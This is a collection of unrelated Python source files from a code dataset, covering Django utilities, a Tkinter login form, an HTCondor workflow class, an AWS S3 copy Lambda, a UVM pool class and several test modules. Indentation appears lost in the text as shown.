self.symbol_table["true"] = symbols.Constant("true", 1)
self.symbol_table["false"] = symbols.Constant("false", 0)
def traverse(self, root):
result = root.visit(self)
for header in self.headers:
self.output_stream.write(f"{header}\n")
self.output_stream.write(f"{result}\n")
@classmethod
def get_vocab_base(cls, visitor_type):
return cls.vocab_bases[visitor_type]
| StarcoderdataPython |
5016731 | from Tkinter import *
root = Tk()
label_1 = Label(root, text = "Name: ")
label_2 = Label(root, text = "Password:")
entry_1 = Entry(root)
entry_2 = Entry(root)
label_1.grid(row = 0, sticky = E)
label_2.grid(row = 1, sticky = E)
entry_1.grid(row = 0, column = 1)
entry_2.grid(row = 1, column = 1)
c = Checkbutton(root, text = "Keep me logged in")
c.grid(columnspan = 2)
root.mainloop()
| StarcoderdataPython |
9630835 | <gh_stars>10-100
from django.db.models import Count, Q
from vocgui.models import Discipline
from vocgui.utils import get_child_count
from django.core.exceptions import PermissionDenied
from vocgui.utils import get_key
from vocgui.models import GroupAPIKey
def get_filtered_discipline_queryset(discipline_view_set):
"""Returns child disciplines belonging to the discipline id
of the passed discipline view set. Only released and non-empty
objects are returned. The number of training sets contained by
a child is annotated as well.
:param discipline_view_set: A handle to the :class:`DisciplineViewSet`
:type discipline_view_set: class
:return: (filtered) queryset
:rtype: QuerySet
"""
queryset = Discipline.objects.filter(
Q(released=True)
& Q(
id__in=Discipline.objects.get(
id=discipline_view_set.kwargs["discipline_id"]
).get_children()
)
).annotate(
total_training_sets=Count(
"training_sets", filter=Q(training_sets__released=True)
),
)
queryset = get_non_empty_disciplines(queryset)
return queryset
def get_overview_discipline_queryset():
"""Returns the general disciplines created by super users if the are
root nodes and recursively either has at least one sub-discipline or one
training set. Additionally, they need to be released by the creator group.
:return: (filtered) queryset
:rtype: QuerySet
"""
queryset = Discipline.objects.filter(
Q(released=True) & Q(creator_is_admin=True)
).annotate(
total_training_sets=Count(
"training_sets", filter=Q(training_sets__released=True)
),
)
queryset = [obj for obj in queryset if obj.is_root_node()]
queryset = get_non_empty_disciplines(queryset)
return queryset
def get_discipline_by_group_queryset(discipline_view_set):
"""Returns overview of disciplines for a given group id, which must be
in the keyword arguments of the passed discipline view set. All elements are
root nodes and recursively either have at least one sub-discipline or one
training set. Additionally, they need to be released by the creator group.
:param discipline_view_set: A handle to the :class:`DisciplineViewSet`
:type discipline_view_set: class
:return: (filtered) queryset
:rtype: QuerySet
"""
queryset = Discipline.objects.filter(
Q(released=True)
& Q(created_by=discipline_view_set.kwargs["group_id"])
& Q(id__in=get_valid_discipline_ids())
).annotate(
total_training_sets=Count(
"training_sets", filter=Q(training_sets__released=True)
),
)
queryset = [obj for obj in queryset if obj.is_root_node()]
return queryset
def get_non_empty_disciplines(queryset):
"""
Filters a discipline queryset so that every element recursively either have
at least one sub-discipline or one training set.
:param queryset: Queryset of `vocgui.Discipline` objects
:type queryset: QuerySet
:return: (filtered) queryset
:rtype: QuerySet
"""
queryset = [
obj
for obj in queryset
if get_child_count(obj) > 0
or obj.training_sets.filter(released=True).count() > 0
]
return queryset
def get_valid_discipline_ids():
"""Function that fetches all valid disciplines and
returns a list of their ids. Valid means the discipline itself
or one of its children contains at least one training set.
:return: list of ids of valid disciplines
:rtype: list[int]
"""
disciplines = [
obj.id
for obj in Discipline.objects.all()
if get_child_count(obj) > 0
or obj.training_sets.filter(released=True).count() > 0
]
return disciplines
def check_group_object_permissions(request, group_id):
"""Function to check if the API-Key of the passed request object
matches one of the hashed keys stored in the database of the
corresponding group id.
:param request: current request
:type request: HttpRequest
:param group_id: group id
:type group_id: int
:raises PermissionDenied: Exception if no API-Key is delivered
:raises PermissionDenied: Exception if API-Key doesn't belong to passed group id
"""
key = get_key(request)
if not key:
raise PermissionDenied()
api_key_object = GroupAPIKey.objects.get_from_key(key)
if int(api_key_object.organization_id) != int(group_id):
raise PermissionDenied()
| StarcoderdataPython |
1946461 | <reponame>DistrictDataLabs/logbook
# catalog.forms
# Forms and other HTML data handling from the web front end.
#
# Author: <NAME> <<EMAIL>>
# Created: Wed Oct 28 15:47:44 2015 -0400
#
# Copyright (C) 2015 District Data Labs
# For license information, see LICENSE.txt
#
# ID: forms.py [] <EMAIL> $
"""
Forms and other HTML data handling from the web front end.
"""
##########################################################################
## Imports
##########################################################################
import requests
from django import forms
from bs4 import BeautifulSoup
from urlparse import urlparse
from datetime import datetime
from django.conf import settings
from autoslug.settings import slugify
from catalog.parser import slugify as username_slugify
from django.contrib.auth.models import User
from catalog.models import Publication
from catalog.parser import ActivityParser
from members.models import Membership, Role
##########################################################################
## Module Constants
##########################################################################
PUBDATE_FORMAT = "%B %d, %Y"
DATASET_ERROR_MSGS = {
"required": "Please select an activity dataset to upload.",
"invalid": "The activity dataset you provided is invalid, please select another.",
"missing": "The activity dataset you specified is missing, please select another.",
"empty": "The uploaded activity dataset is empty, cannot upload.",
"max_length": "The activity dataset is too big, please submit a smaller CSV.",
}
##########################################################################
## Upload Form
##########################################################################
class DatasetUploadForm(forms.Form):
"""
Post an activity dataset and add the activity to the logbook.
"""
dataset = forms.FileField(required=True, error_messages=DATASET_ERROR_MSGS)
def __init__(self, *args, **kwargs):
self.request = kwargs.pop('request', None)
super(DatasetUploadForm, self).__init__(*args, **kwargs)
def save(self):
"""
Parse the dataset
"""
parser = ActivityParser()
dataset = self.cleaned_data['dataset']
# Execute the parsing
dataset.open('rb')
counts = parser.parse(dataset)
dataset.close()
return counts
class LinkFetchForm(forms.Form):
"""
Submit a URL to lookup the publication.
"""
link = forms.URLField(required=True)
def clean_link(self):
"""
Validate a link such that its domain is in the list of valid
publication domains and that we haven't already added the link to the
database (because then there is nothing we can do).
"""
data = self.cleaned_data['link']
urlp = urlparse(data)
# Test to ensure is in the valid domains
if urlp.netloc not in settings.PUBLICATION_DOMAINS:
raise forms.ValidationError(
"Domain {!r} is not a valid publication domain. "
"Only DDL publications can be fetched."
.format(urlp.netloc,)
)
# If the link is in the DB - don't do any work.
if Publication.objects.filter(link=data).exists():
raise forms.ValidationError(
"This link has already been added to the database!"
)
return data
def get_author(self, name):
"""
Attempts to retrieve an author by the full name from the database.
"""
parts = name.split()
uname = parts[0][0] + parts[-1] if len(parts) > 1 else parts[0]
uname = username_slugify(uname)
return User.objects.get(username=uname)
def fetch(self):
"""
Fetches the blog post, parses it and returns a dictionary of relevant
values and information. Use this method sparingly.
"""
link = self.cleaned_data['link']
resp = requests.get(link)
soup = BeautifulSoup(resp.content, "html5lib")
return {
"title": soup.find(class_='kaia_header_title').text.strip(),
"authors": soup.find(class_="name_link").text.strip().split(" and "),
"pubdate": datetime.strptime(soup.find(class_="entry_date").text.strip(), PUBDATE_FORMAT).date(),
"link": link,
}
def save(self):
"""
Parses and saves the publication to the database.
"""
kwargs = self.fetch()
# Fetch authors first to error early if we can't find the user.s
authors = [
self.get_author(name) for name in kwargs.pop('authors', [])
]
# Get publication by slug or create it with the discovered attributes
pub, crt = Publication.objects.update_or_create(slug=slugify(kwargs['title']), defaults=kwargs)
# Add authors to the publication if any
for author in authors:
# Make sure the author has the correct role
_ = Membership.objects.get_or_create(
role=Role.objects.get(slug="blog-author"), profile=author.profile
)
# Add author to the publication
if author not in pub.authors.all():
pub.authors.add(author)
return pub, crt
| StarcoderdataPython |
9668659 | <gh_stars>0
#!/usr/bin/env python
from random import randint as ri
print [n for n in [ri(1, 99) for i in range(9)] if n%2]
| StarcoderdataPython |
6538222 | from typing import Union
from lxml.etree import _Element
from utils.parse import parse_int
from utils.xmlutils import find_value
class Status:
code: Union[int, None]
status_type: Union[str, None]
def __init__(self, code: int = None, status_type: str = None):
"""
Args:
code (int): status code
status_type (str): status_type of status (INFO, WARN, and ERROR)
"""
self.code = code
self.status_type = status_type
def __str__(self) -> str:
if self.status_type != None and self.code != None:
return '%s (%d)' % (self.status_type, self.code)
if self.status_type != None:
return self.status_type
if self.code != None:
return str(self.code)
return ''
@classmethod
def parse_ofx(cls, status_el: _Element = None):
if status_el is not None:
return Status(
code=find_value(status_el, 'CODE', parse_int),
status_type=find_value(status_el, 'SEVERITY')
)
return None
| StarcoderdataPython |
5020640 | # coding: utf-8
"""
HTCondor workflow implementation. See https://research.cs.wisc.edu/htcondor.
"""
__all__ = ["HTCondorWorkflow"]
import os
import logging
from abc import abstractmethod
from collections import OrderedDict
import luigi
from law.workflow.remote import BaseRemoteWorkflow, BaseRemoteWorkflowProxy
from law.job.base import JobArguments
from law.task.proxy import ProxyCommand
from law.target.file import get_path
from law.target.local import LocalDirectoryTarget
from law.parameter import NO_STR
from law.util import law_src_path, merge_dicts, DotDict
from law.contrib.htcondor.job import HTCondorJobManager, HTCondorJobFileFactory
logger = logging.getLogger(__name__)
class HTCondorWorkflowProxy(BaseRemoteWorkflowProxy):
workflow_type = "htcondor"
def create_job_manager(self, **kwargs):
return self.task.htcondor_create_job_manager(**kwargs)
def create_job_file_factory(self, **kwargs):
return self.task.htcondor_create_job_file_factory(**kwargs)
def create_job_file(self, job_num, branches):
task = self.task
config = self.job_file_factory.Config()
# the file postfix is pythonic range made from branches, e.g. [0, 1, 2, 4] -> "_0To5"
postfix = "_{}To{}".format(branches[0], branches[-1] + 1)
config.postfix = postfix
pf = lambda s: "__law_job_postfix__:{}".format(s)
# get the actual wrapper file that will be executed by the remote job
wrapper_file = get_path(task.htcondor_wrapper_file())
config.executable = os.path.basename(wrapper_file)
# collect task parameters
proxy_cmd = ProxyCommand(task.as_branch(branches[0]), exclude_task_args={"branch"},
exclude_global_args=["workers", "local-scheduler"])
if task.htcondor_use_local_scheduler():
proxy_cmd.add_arg("--local-scheduler", "True", overwrite=True)
for key, value in OrderedDict(task.htcondor_cmdline_args()).items():
proxy_cmd.add_arg(key, value, overwrite=True)
# job script arguments
job_args = JobArguments(
task_cls=task.__class__,
task_params=proxy_cmd.build(skip_run=True),
branches=branches,
auto_retry=False,
dashboard_data=self.dashboard.remote_hook_data(
job_num, self.submission_data.attempts.get(job_num, 0)),
)
config.arguments = job_args.join()
# prepare render variables
config.render_variables = {}
# input files
config.input_files = [wrapper_file, law_src_path("job", "job.sh")]
config.render_variables["job_file"] = pf("job.sh")
# add the bootstrap file
bootstrap_file = task.htcondor_bootstrap_file()
if bootstrap_file:
config.input_files.append(bootstrap_file)
config.render_variables["bootstrap_file"] = pf(os.path.basename(bootstrap_file))
# add the stageout file
stageout_file = task.htcondor_stageout_file()
if stageout_file:
config.input_files.append(stageout_file)
config.render_variables["stageout_file"] = pf(os.path.basename(stageout_file))
# does the dashboard have a hook file?
dashboard_file = self.dashboard.remote_hook_file()
if dashboard_file:
config.input_files.append(dashboard_file)
config.render_variables["dashboard_file"] = pf(os.path.basename(dashboard_file))
# output files
config.output_files = []
# custom content
config.custom_content = []
# logging
# we do not use condor's logging mechanism since it requires that the submission directory
# is present when it retrieves logs, and therefore we rely on the job.sh script
config.log = None
config.stdout = None
config.stderr = None
if task.transfer_logs:
log_file = "stdall.txt"
config.custom_log_file = log_file
config.render_variables["log_file"] = pf(log_file)
# we can use condor's file stageout only when the output directory is local
# otherwise, one should use the stageout_file and stageout manually
output_dir = task.htcondor_output_directory()
if isinstance(output_dir, LocalDirectoryTarget):
config.absolute_paths = True
config.custom_content.append(("initialdir", output_dir.path))
else:
del config.output_files[:]
# task hook
config = task.htcondor_job_config(config, job_num, branches)
# determine basenames of input files and add that list to the render data
input_basenames = [pf(os.path.basename(path)) for path in config.input_files[1:]]
config.render_variables["input_files"] = " ".join(input_basenames)
# build the job file and get the sanitized config
job_file, config = self.job_file_factory(**config.__dict__)
# determine the absolute custom log file if set
abs_log_file = None
if config.custom_log_file and isinstance(output_dir, LocalDirectoryTarget):
abs_log_file = output_dir.child(config.custom_log_file, type="f").path
# return job and log files
return {"job": job_file, "log": abs_log_file}
def destination_info(self):
info = []
if self.task.htcondor_pool != NO_STR:
info.append(", pool: {}".format(self.task.htcondor_pool))
if self.task.htcondor_scheduler != NO_STR:
info.append(", scheduler: {}".format(self.task.htcondor_scheduler))
return ", ".join(info)
class HTCondorWorkflow(BaseRemoteWorkflow):
workflow_proxy_cls = HTCondorWorkflowProxy
htcondor_workflow_run_decorators = None
htcondor_job_manager_defaults = None
htcondor_job_file_factory_defaults = None
htcondor_pool = luigi.Parameter(default=NO_STR, significant=False, description="target "
"htcondor pool; default: empty")
htcondor_scheduler = luigi.Parameter(default=NO_STR, significant=False, description="target "
"htcondor scheduler; default: empty")
htcondor_job_kwargs = ["htcondor_pool", "htcondor_scheduler"]
htcondor_job_kwargs_submit = None
htcondor_job_kwargs_cancel = None
htcondor_job_kwargs_query = None
exclude_params_branch = {"htcondor_pool", "htcondor_scheduler"}
exclude_index = True
@abstractmethod
def htcondor_output_directory(self):
return None
def htcondor_workflow_requires(self):
return DotDict()
def htcondor_bootstrap_file(self):
return None
def htcondor_wrapper_file(self):
return law_src_path("job", "bash_wrapper.sh")
def htcondor_stageout_file(self):
return None
def htcondor_output_postfix(self):
return "_" + self.get_branches_repr()
def htcondor_create_job_manager(self, **kwargs):
kwargs = merge_dicts(self.htcondor_job_manager_defaults, kwargs)
return HTCondorJobManager(**kwargs)
def htcondor_create_job_file_factory(self, **kwargs):
# job file fectory config priority: kwargs > class defaults
kwargs = merge_dicts({}, self.htcondor_job_file_factory_defaults, kwargs)
return HTCondorJobFileFactory(**kwargs)
def htcondor_job_config(self, config, job_num, branches):
return config
def htcondor_use_local_scheduler(self):
return False
def htcondor_cmdline_args(self):
return {}
| StarcoderdataPython |
1993062 | <filename>recirq/qaoa/experiments/run-problem-generation.py
# Copyright 2020 Google
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from recirq.qaoa.experiments.problem_generation_tasks import SKProblemGenerationTask, \
HardwareGridProblemGenerationTask, ThreeRegularProblemGenerationTask, \
generate_3_regular_problem, generate_sk_problem, generate_hardware_grid_problem
def main():
dataset_id = '2020-03-19'
hardware_grid_problem_tasks = [
HardwareGridProblemGenerationTask(
dataset_id=dataset_id,
device_name='Sycamore23',
instance_i=i,
n_qubits=n
)
for i in range(100)
for n in range(2, 23 + 1)
]
sk_problem_tasks = [
SKProblemGenerationTask(
dataset_id=dataset_id,
instance_i=i,
n_qubits=n
)
for i in range(100)
for n in range(3, 17 + 1)
]
three_regular_problem_tasks = [
ThreeRegularProblemGenerationTask(
dataset_id=dataset_id,
instance_i=i,
n_qubits=n
)
for i in range(100)
for n in range(3, 23 + 1) if 3 * n % 2 == 0
]
for task in hardware_grid_problem_tasks:
generate_hardware_grid_problem(task)
for task in sk_problem_tasks:
generate_sk_problem(task)
for task in three_regular_problem_tasks:
generate_3_regular_problem(task)
if __name__ == '__main__':
main()
| StarcoderdataPython |
45752 | from math import radians, cos, sqrt
from dbi import select_from_zip, select_from_id, create_connection
from api import *
import usaddress
def distance(lat1, lon1, lat2, lon2):
x = radians(lon1 - lon2) * cos(radians((lat1 + lat2) / 2))
y = radians(lat1 - lat2)
# 6371000 is the radius of earth, used to triangulate distance!
dist = 6371000 * sqrt((x * x) + (y * y))
return dist
class Closest_boxes(object):
def __init__(self, address, key):
self.address = address
self.key = key
def geoencode(self):
geo = geoencoding(self.address, self.key)
g = geo["results"][0]["geometry"]
location = g["location"]
lat1 = location["lat"]
lon1 = location["lng"]
return [lat1, lon1]
def parse_address(self):
try:
ret = usaddress.tag(self.address)
except usaddress.RepeatedLabelError:
ret = "Please enter a valid address."
return ret
def mailbox_loc(self):
conn = create_connection("fulldata.sqlite")
parsed = self.parse_address()[0]
zipcode = parsed["ZipCode"]
return select_from_zip(conn, zipcode)
def closest_boxes(self):
high, med, low = -1, -1, -1
hi, mi, li = 0, 0, 0
selfaddr = self.geoencode()
boxes = self.mailbox_loc()
for box in boxes:
lat = box[-2]
lon = box[-1]
dist = distance(float(lat), float(lon), float(selfaddr[0]), float(selfaddr[1]))
if high == -1 or med == -1 or low == -1:
high, med, low = dist, dist, dist
elif dist <= low:
high, med, low, hi, mi, li = med, low, dist, mi, li, box[0]
elif low < dist <= med:
high, med, hi, mi = med, dist, mi, box[0]
elif dist > med <= high:
high, hi = dist, box[0]
else:
pass
conn = create_connection("fulldata.sqlite")
r0 = select_from_id(conn, hi)
r1 = select_from_id(conn, mi)
r2 = select_from_id(conn, li)
ret = [r0, r1, r2]
return ret
def create_address(self):
box_locs = self.closest_boxes()
print(box_locs)
if len(box_locs) == 0:
return {"No boxes found": ""}
else:
box_locs.reverse()
ret = {}
for box in box_locs:
if len(box) == 0:
ret["No close boxes found. Please visit https://mailboxlocate.com/ to find your nearest mailbox"] = ""
continue
box_ = box[0]
addr = box_[1]
city = box_[2]
state = box_[3]
zipcode = box_[4]
full = "{}, {}, {}, {}".format(addr, city, state, zipcode)
ret[full] = (box_[-2], box_[-1])
return ret
| StarcoderdataPython |
302078 | """
-*- coding: utf-8 -*-
========================
AWS Lambda
========================
Contributor: <NAME> (<NAME>)
========================
"""
import boto3
from pprint import pprint
def lambda_handler(event, context):
s3 = boto3.resource("s3")
source_bucket = s3.Bucket("sbucket-name")
destination_bucket = s3.Bucket("dbucket-name")
for obj in source_bucket.objects.all():
destination_bucket_file_rename = obj.key + str("_new")
s3.Object(destination_bucket.name, destination_bucket_file_rename).copy_from(CopySource= { 'Bucket': obj.bucket_name , 'Key' : obj.key})
return 'Thanks'
| StarcoderdataPython |
12822441 | <reponame>dperl-sol/cctbx_project
from __future__ import absolute_import, division, print_function
from scitbx import math
from scitbx.array_family import flex
from six.moves import range
def tst(N=3):
weights = flex.double(N)*0.0+1.0
mvo = math.multivariate_moments( weights )
for ii in range(100000):
tmp = 0.1*(1.0-2.0*flex.random_double(N))+flex.double(range(N))*0.0+1.0
mvo.update(tmp)
vcv = mvo.vcv_upper_triangle_packed()
mean = mvo.mean()
var = mvo.variance()
for m in mean:
assert abs(m-1.0)<1e-3
for v in var:
assert abs(v-0.2*0.2/12)<1e-4
for c in vcv:
assert abs(c/0.0033)<1e-3
if __name__ == "__main__":
tst()
print("OK")
| StarcoderdataPython |
1838503 | <filename>ironic/tests/conductor/test_task_manager.py
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# coding=utf-8
# Copyright 2013 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests for :class:`ironic.conductor.task_manager`."""
from testtools import matchers
from ironic.common import exception
from ironic.conductor import task_manager
from ironic.db import api as dbapi
from ironic.openstack.common import uuidutils
from ironic.tests.conductor import utils as mgr_utils
from ironic.tests.db import base
from ironic.tests.db import utils
def create_fake_node(i):
dbh = dbapi.get_instance()
node = utils.get_test_node(id=i,
uuid=uuidutils.generate_uuid())
dbh.create_node(node)
return node['uuid']
def ContainsUUIDs(uuids):
def _task_uuids(task):
return [r.node.uuid for r in task.resources]
return matchers.AfterPreprocessing(_task_uuids,
matchers.Equals(uuids))
class TaskManagerTestCase(base.DbTestCase):
def setUp(self):
super(TaskManagerTestCase, self).setUp()
self.dbapi = dbapi.get_instance()
self.driver = mgr_utils.get_mocked_node_manager()
self.uuids = [create_fake_node(i) for i in xrange(1, 6)]
self.uuids.sort()
def test_get_one_node(self):
uuids = [self.uuids[0]]
self.config(host='test-host')
with task_manager.acquire(uuids) as task:
node = task.resources[0].node
self.assertEqual(uuids[0], node.uuid)
self.assertEqual('test-host', node.reservation)
def test_get_many_nodes(self):
uuids = self.uuids[1:3]
self.config(host='test-host')
with task_manager.acquire(uuids) as task:
self.assertThat(task, ContainsUUIDs(uuids))
for node in [r.node for r in task.resources]:
self.assertEqual('test-host', node.reservation)
def test_get_nodes_nested(self):
uuids = self.uuids[0:2]
more_uuids = self.uuids[3:4]
with task_manager.acquire(uuids) as task:
self.assertThat(task, ContainsUUIDs(uuids))
with task_manager.acquire(more_uuids) as another_task:
self.assertThat(another_task, ContainsUUIDs(more_uuids))
def test_get_locked_node(self):
uuids = self.uuids[0:2]
def _lock_again(u):
with task_manager.acquire(u):
raise exception.IronicException("Acquired lock twice.")
with task_manager.acquire(uuids) as task:
self.assertThat(task, ContainsUUIDs(uuids))
self.assertRaises(exception.NodeLocked,
_lock_again,
uuids)
def test_get_shared_lock(self):
uuids = self.uuids[0:2]
# confirm we can elevate from shared -> exclusive
with task_manager.acquire(uuids, shared=True) as task:
self.assertThat(task, ContainsUUIDs(uuids))
with task_manager.acquire(uuids, shared=False) as inner_task:
self.assertThat(inner_task, ContainsUUIDs(uuids))
# confirm someone else can still get a shared lock
with task_manager.acquire(uuids, shared=False) as task:
self.assertThat(task, ContainsUUIDs(uuids))
with task_manager.acquire(uuids, shared=True) as inner_task:
self.assertThat(inner_task, ContainsUUIDs(uuids))
class ExclusiveLockDecoratorTestCase(base.DbTestCase):
def setUp(self):
super(ExclusiveLockDecoratorTestCase, self).setUp()
self.dbapi = dbapi.get_instance()
self.driver = mgr_utils.get_mocked_node_manager()
self.uuids = [create_fake_node(123)]
def test_require_exclusive_lock(self):
@task_manager.require_exclusive_lock
def do_state_change(task):
for r in task.resources:
task.dbapi.update_node(r.node.uuid,
{'power_state': 'test-state'})
with task_manager.acquire(self.uuids, shared=True) as task:
self.assertRaises(exception.ExclusiveLockRequired,
do_state_change,
task)
with task_manager.acquire(self.uuids, shared=False) as task:
do_state_change(task)
for uuid in self.uuids:
res = self.dbapi.get_node(uuid)
self.assertEqual('test-state', res.power_state)
@task_manager.require_exclusive_lock
def _do_state_change(self, task):
for r in task.resources:
task.dbapi.update_node(r.node.uuid,
{'power_state': 'test-state'})
def test_require_exclusive_lock_on_object(self):
with task_manager.acquire(self.uuids, shared=True) as task:
self.assertRaises(exception.ExclusiveLockRequired,
self._do_state_change,
task)
with task_manager.acquire(self.uuids, shared=False) as task:
self._do_state_change(task)
for uuid in self.uuids:
res = self.dbapi.get_node(uuid)
self.assertEqual('test-state', res.power_state)
def test_one_node_per_task_properties(self):
with task_manager.acquire(self.uuids) as task:
self.assertEqual(task.node, task.resources[0].node)
self.assertEqual(task.driver, task.resources[0].driver)
self.assertEqual(task.node_manager, task.resources[0])
def test_one_node_per_task_properties_fail(self):
self.uuids.append(create_fake_node(456))
with task_manager.acquire(self.uuids) as task:
def get_node():
return task.node
def get_driver():
return task.driver
def get_node_manager():
return task.node_manager
self.assertRaises(AttributeError, get_node)
self.assertRaises(AttributeError, get_driver)
self.assertRaises(AttributeError, get_node_manager)
| StarcoderdataPython |
1894021 | #//
#//------------------------------------------------------------------------------
#// Copyright 2007-2011 Mentor Graphics Corporation
#// Copyright 2007-2010 Cadence Design Systems, Inc.
#// Copyright 2010 Synopsys, Inc.
#// Copyright 2019 <NAME> (tpoikela)
#// All Rights Reserved Worldwide
#//
#// Licensed under the Apache License, Version 2.0 (the
#// "License"); you may not use this file except in
#// compliance with the License. You may obtain a copy of
#// the License at
#//
#// http://www.apache.org/licenses/LICENSE-2.0
#//
#// Unless required by applicable law or agreed to in
#// writing, software distributed under the License is
#// distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
#// CONDITIONS OF ANY KIND, either express or implied. See
#// the License for the specific language governing
#// permissions and limitations under the License.
#//------------------------------------------------------------------------------
import collections
from .uvm_object import UVMObject
from ..macros import uvm_warning
class UVMPool(UVMObject):
"""
Implements a class-based dynamic associative array. Allows sparse arrays to
be allocated on demand, and passed and stored by reference.
"""
type_name = "uvm_pool"
m_global_pool = None
def __init__(self, name="", T=None):
UVMObject.__init__(self, name)
self.pool = collections.OrderedDict()
self.ptr = -1
self.T = T
@classmethod
def get_global_pool(cls):
"""
Returns the singleton global pool. Unlike in SV, uvm-python has only one
global pool.
This allows items to be shared amongst components throughout the
verification environment.
Returns:
UVMPool: Single global pool
"""
if UVMPool.m_global_pool is None:
UVMPool.m_global_pool = UVMPool("pool")
return UVMPool.m_global_pool
@classmethod
def get_global(cls, key):
"""
Returns the specified item instance from the global item pool.
Args:
key (str):
Returns:
any: Item matching the given key.
"""
gpool = UVMPool.get_global_pool()
return gpool.get(key)
def get(self, key):
"""
Function: get
Returns the item with the given `key`.
If no item exists by that key, a new item is created with that key
and returned.
Args:
key:
Returns:
"""
if key in self.pool:
return self.pool[key]
elif self.T is not None:
self.pool[key] = self.T()
return self.pool[key]
return None
def add(self, key, item):
self.pool[key] = item
def num(self):
return len(self.pool.keys())
def keys(self):
return self.pool.keys()
def key_list(self):
return list(self.pool.keys())
def delete(self, key=None):
if key is None:
self.pool = {}
else:
if key in self.pool:
del self.pool[key]
def exists(self, key):
return key in self.pool
def last(self):
keys = self.pool.keys()
if len(keys) > 0:
self.ptr = self.num() - 1
return next(reversed(self.pool))
else:
return False
def has_first(self):
return self.num() > 0
def has_last(self):
return self.num() > 0
def first(self):
# keys = self.pool.keys()
for k in self.pool:
self.ptr = 0
return k
return False
def has_next(self):
if self.ptr < (self.num() - 1):
return True
return False
def next(self):
if self.has_next() is True:
self.ptr += 1
key = list(self.pool.keys())[self.ptr]
return key
return None
def has_prev(self):
if self.ptr > 0:
return True
return False
def prev(self):
if self.has_prev() is True:
self.ptr -= 1
key = list(self.pool.keys())[self.ptr]
return key
return None
def create(self, name=""):
return UVMPool(name, self.T)
def do_print(self, printer):
while self.has_next():
key = self.next()
item = self.pool[key]
# print_generic(self, name, type_name, size, value, scope_separator="."):
if hasattr(item, 'convert2string'):
printer.print_string(item.get_name(), item.convert2string())
else:
name = ""
if hasattr(key, 'get_name'):
name = key.get_name()
printer.print_generic(name, '', 0, str(item))
def __len__(self):
"""
len() operator
Returns:
"""
return self.num()
def __contains__(self, key):
"""
Implements X in Y operator
Args:
key:
Returns:
"""
return key in self.pool
def __setitem__(self, key, value):
"""
Implements aa[x] = y
Args:
key:
value:
"""
self.pool[key] = value
def __getitem__(self, key):
"""
Implements aa[x]
Args:
key:
Returns:
Raises:
"""
if key in self.pool:
return self.pool[key]
else:
raise IndexError('No key found')
class UVMObjectStringPool(UVMPool):
"""
This provides a specialization of the generic `UVMPool` class for
an associative array of `UVMObject`-based objects indexed by string.
Specializations of this class include the `UVMEventPool` (a
`UVMObjectStringPool` storing `UVMEvent` and
`UVMBarrierPool` (a `UVMObjectStringPool` storing `UVMBarrier`).
"""
m_global_pool = None
type_name = "uvm_obj_str_pool"
def __init__(self, name="", Constr=UVMObject):
"""
Creates a new pool with the given `name`.
Args:
name (str): Name of the pool.
Constr (class): Used for constructing default objects.
"""
UVMPool.__init__(self, name)
self.Constructor = Constr
def get_type_name(self):
"""
Returns the type name of this object.
Returns:
str: Type name of this object.
"""
return UVMObjectStringPool.type_name
@classmethod
def get_global_pool(cls):
"""
Returns the singleton global pool.
This allows objects to be shared amongst components throughout the
verification environment.
Returns:
UVMObjectStringPool: Global pool
"""
if UVMObjectStringPool.m_global_pool is None:
UVMObjectStringPool.m_global_pool = UVMObjectStringPool("global_pool")
return UVMObjectStringPool.m_global_pool
@classmethod
def get_global(cls, key):
"""
Returns the specified item instance from the global item pool.
Args:
key (str): Key used for getting the item from global pool.
Returns:
any: Object matching the key in the global pool.
"""
gpool = UVMObjectStringPool.get_global_pool()
return gpool.get(key)
def get(self, key):
"""
Returns the object item at the given string `key`.
If no item exists by the given `key`, a new item is created for that key
and returned.
Args:
key (str): Key used for getting the item.
Returns:
any: Item matching the key. If no match, returns new object.
"""
if key not in self.pool:
self.pool[key] = self.Constructor(key)
return self.pool[key]
def delete(self, key):
"""
Removes the item with the given string `key` from the pool.
Args:
key (str): Key used for removing the item.
"""
if not self.exists(key):
uvm_warning("POOLDEL", "delete: key '{}' doesn't exist".format(key))
return
self.delete(key)
# endfunction
def do_print(self, printer):
"""
Function- do_print
Args:
printer (UVMPrinter): Printer used for printing
"""
key = ""
num_keys = len(list(self.pool.keys()))
printer.print_array_header("pool", num_keys,"aa_object_string")
if self.has_first():
key = self.first()
while True:
printer.print_object("[" + key + "]", self.pool[key],"[")
if self.has_next():
key = self.next()
else:
break
printer.print_array_footer()
# endfunction
class UVMEventPool(UVMObjectStringPool):
def __init__(self, name=""):
from .uvm_event import UVMEvent
UVMObjectStringPool.__init__(self, name, UVMEvent)
class UVMBarrierPool(UVMObjectStringPool):
def __init__(self, name=""):
from .uvm_barrier import UVMBarrier
UVMObjectStringPool.__init__(self, name, UVMBarrier)
| StarcoderdataPython |
1965393 | <gh_stars>0
# Copyright 2019 The TensorNetwork Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Text, Union, Optional, Sequence, Tuple
from tensornetwork.tensor import Tensor
from tensornetwork import ncon_interface
def _check_backends(tensors: Sequence[Tensor], fname: str) -> Tuple[bool, str]:
""" Checks that each of tensors has the same backend, returning True and an
empty string if so, or False and an error string if not.
Args:
tensors: The list of tensors whose backends to check.
fname: The name of the calling function, which will go into the errstring.
Returns:
(flag, errstr): Whether all backends agree, and an error message if not.
"""
backend_names = [tensor.backend.name for tensor in tensors]
